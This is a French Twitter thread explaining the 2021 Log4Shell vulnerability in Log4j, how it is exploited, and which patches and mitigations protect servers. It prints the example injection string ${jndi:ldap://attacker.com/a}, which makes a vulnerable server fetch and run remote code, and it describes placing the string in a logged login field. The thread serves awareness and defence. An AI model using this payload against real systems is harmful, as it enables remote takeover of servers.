Mathis Hammel

Depuis hier, une vulnérabilité 0-day sur la plupart des serveurs Java est exploitée dans le monde entier via une faille dans Log4j. Twitter, Apple, Minecraft et même les voitures Tesla sont vulnérables.

🧵Mini-thread pour vous expliquer la faille la plus importante de 2021. https://t.co/t2ql2FiQG3

Vous vous souvenez de ShellShock ? Là c'est 100 fois pire.

Baptisée Log4Shell, cette attaque permet d'obtenir un shell sur la machine de la victime en lui faisant simplement afficher une payload d'une vingtaine de caractères dans ses logs: ${jndi:ldap://attacker.com/a}

Le vecteur d'injection est généralement très simple, il suffit de l'inclure dans un paramètre qui sera affiché dans les logs, par exemple à la place de l'adresse email dans la page de connexion.

On peut voir ici la vulnérabilité déclenchée sur la page de login Twitter : https://t.co/mtAhWYvrKo

Au moment de gérer cette requête, le moteur Log4j interprète le ${...} comme un template, et essaie de récupérer un fichier Java à l'URL indiquée.

Ce fichier Java est ensuite exécuté et permet donc à l'attaquant de prendre complètement le contrôle du serveur.

Si vous utilisez Log4j en production (spoiler alert : c'est probablement le cas même si votre stack n'utilise pas Java), vous avez de grandes chances d'être vulnérables à cette vulnérabilité dont la sévérité CVSS est de 10.0, soit le maximum possible ! https://t.co/RoiUGI3UgB

La faille est activement exploitée dans la nature de manière massivement automatisée (notamment pour installer des ransomwares sur les serveurs), et il est nécessaire de prendre des mesures immédiates.

Heureusement, il est facile de se protéger, je vous fais une petite liste. https://t.co/qGpiiLb4d3

👉Installez le patch de sécurité 2.15.0 si vous utilisez Log4j dans votre code

👉 Utilisez les versions de JRE supérieures à 6u211, 7u201, 8u191, et 11.0.1 (qui désactivent la politique par défaut à l'origine du bug)

👉Filtrez et surveillez les flux sortants de vos serveurs

Pour la prochaine fois, si vous voulez découvrir les vulnérabilités en direct histoire de pouvoir les corriger rapidement (et pas le lendemain via un de mes threads lol), je vous invite à suivre @ANSSI_FR et @CERT_FR !

Et comme l'illustre cette histoire parmi tant d'autres, la cybersécurité est un domaine en très grande tension avec une forte pénurie de talents.

Je suis fier de parrainer @Guardia_School, une école spécialisée en cybersécurité qui ouvrira en 2022 😀 https://t.co/kSipHyOKfU

Précision : utiliser une JRE à jour ne suffit pas pour être protégé, seulement contre la payload la plus courante. Merci @gouttegd pour l'info ! https://t.co/kw9x5i0NVN

Sat Dec 11 18:14:29 +0000 2021